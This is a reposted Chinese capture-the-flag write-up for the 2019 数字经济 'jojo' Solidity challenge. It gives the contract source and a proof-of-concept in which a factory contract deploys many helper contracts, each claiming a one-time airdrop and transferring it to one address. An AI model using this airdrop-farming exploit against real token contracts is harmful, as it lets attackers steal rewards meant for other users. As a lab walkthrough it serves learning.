本文主要是介绍2019 数字经济 jojo,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
知识点
- Airdrop Hunting(薅羊毛)
WP
源码:
pragma solidity ^0.4.24;contract jojo {mapping(address => uint) public balanceOf;mapping(address => uint) public gift;address owner;constructor()public{owner = msg.sender;}event SendFlag(string b64email);function payforflag(string b64email) public {require(balanceOf[msg.sender] >= 100000);emit SendFlag(b64email);}function jojogame() payable{uint geteth = msg.value / 1000000000000000000; //etherbalanceOf[msg.sender] += geteth;}function gift() public {assert(gift[msg.sender] == 0);balanceOf[msg.sender] += 100;gift[msg.sender] = 1;}function transfer(address to,uint value) public{assert(balanceOf[msg.sender] >= value);balanceOf[msg.sender] -= value;balanceOf[to] += value;}}
非常简单的逻辑,就是需要balance大于等于100000才能得到flag,有个空投函数gift,每次可以给一个还没有领取过空投的账号balance里加100。而且还有个转账函数,因此就是想办法开1000个账号都领空投,然后转给一个账号即可。
但是这。。。。咋办到呢?。。。有点迷,看了一下WP,才发现自己的solidity其实学的还是不扎实:
因此msg.sender并不一定是外部账号,也可以是合约账号,这样就好办了,写个POC:
pragma solidity ^0.4.24;contract jojo {mapping(address => uint) public balanceOf;mapping(address => uint) public gift;address owner;constructor()public{owner = msg.sender;}function jojogame() payable{uint geteth = msg.value / 1000000000000000000;balanceOf[msg.sender] += geteth;}function gift() public {assert(gift[msg.sender] == 0);balanceOf[msg.sender] += 100;gift[msg.sender] = 1;}function transfer(address to,uint value) public{assert(balanceOf[msg.sender] >= value);balanceOf[msg.sender] -= value;balanceOf[to] += value;}}contract Test{jojo constant private a = jojo(0xE26d0B158729a3109b14fEE0542ccdAeE21bEB45);constructor() public{a.gift();a.transfer(0x7D11f36fA2FD9B7A4069650Cd8A2873999263FB8,100);}
}contract Feng {function attack() public {for(uint i=0;i<=100;i++){Test test = new Test();}}
}
也是参考了别的师傅的WP,有个点就是attack函数里每次i的最大值,不能太大,100比较适合,再大的话就会:
这篇关于2019 数字经济 jojo的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
